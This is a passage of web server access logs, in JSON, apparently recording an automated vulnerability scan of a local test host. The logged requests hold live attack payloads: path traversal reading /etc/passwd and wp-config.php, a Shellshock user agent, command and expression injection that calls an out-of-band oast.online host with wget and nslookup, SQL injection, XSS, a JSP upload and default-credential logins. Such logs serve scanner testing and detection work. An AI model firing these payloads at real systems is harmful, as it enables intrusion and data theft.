(KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ftpsync.settings HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/iwp-client/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iNotes/Forms6.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /doc/page/login.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"wsecure_action=update&publish=\x22;} header(\x22Nuclei: CVE-2016-10960\x22); class WSecureConfig2 {var $test=\x22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/wsecure/wsecure-config.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gateway/routes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"_charset_=utf-8&j_username=author&j_password=author&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"macAddress=112233445566%3Bwget+http%3A%2F%2Fca289tosmpvbbd2g07h0j9wi1xb5zudce.oast.online%23®info=0&writeData=Submit","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /boardDataWW.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/haberadam/api/mobile-info.php?id= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"{\x0D\x0A \x22type\x22:\x22read\x22,\x0D\x0A \x22mbean\x22:\x22java.lang:type=Memory\x22,\x0D\x0A \x22target\x22:{\x0D\x0A \x22url\x22:\x22service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\x22\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /jolokia/read/getDiagnosticOptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/slogin/login.py HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"() { :; }; echo ; echo ; /bin/cat /etc/passwd", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/50 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpMyAdmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gtranslate/url_addon/gtranslate.php?glang=en&gurl=/www.pluginvulnerabilities.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /doc/script/common.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iNotes/Forms7.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/gateway/routes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"_charset_=utf-8&j_username=anonymous&j_password=anonymous&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /e/ViewImg/index.html?url=javascript:alert(1) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /blog/wp-content/themes/haberadam/api/mobile-info.php?id= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/51 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/logoff.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?post_type=post&s=%22%3E%3Cscript%3Ealert(/29KBaGFy7NIoz62zhGSl68w7HbU/)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"{\x22name\x22:\x22\x22,\x22before\x22:\x22\x22,\x22after\x22:\x22\x22,\x22direction\x22:\x22desc\x22,\x22order_by\x22:\x22date\x22,\x22num_of_rows\x22:100}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ui/api/v1/global-search/builds?jfLoader=true HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=lp_background_single_email&lp-dismiss-notice=xxx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/targets HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iNotes/Forms8.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"_=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"_charset_=utf-8&j_username=jdoe@geometrixx.info&j_password=jdoe&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hystrix/;a=a/__$%7BT%20%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22nslookup%20ca289tosmpvbbd2g07h036k5c9fwffjns.oast.online%22%29%7D__::.x/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/52 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-app.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"------WebKitFormBoundaryFy3iNVBftjP6IOwo\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x2212.jsp\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A<%out.print(364536*876356);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>\x0D\x0A------WebKitFormBoundaryFy3iNVBftjP6IOwo--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /page/exportImport/uploadOperation.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pyproject.toml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pdb/meta/v1/version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iNotes/Forms85.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/setup-config.php?step=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", 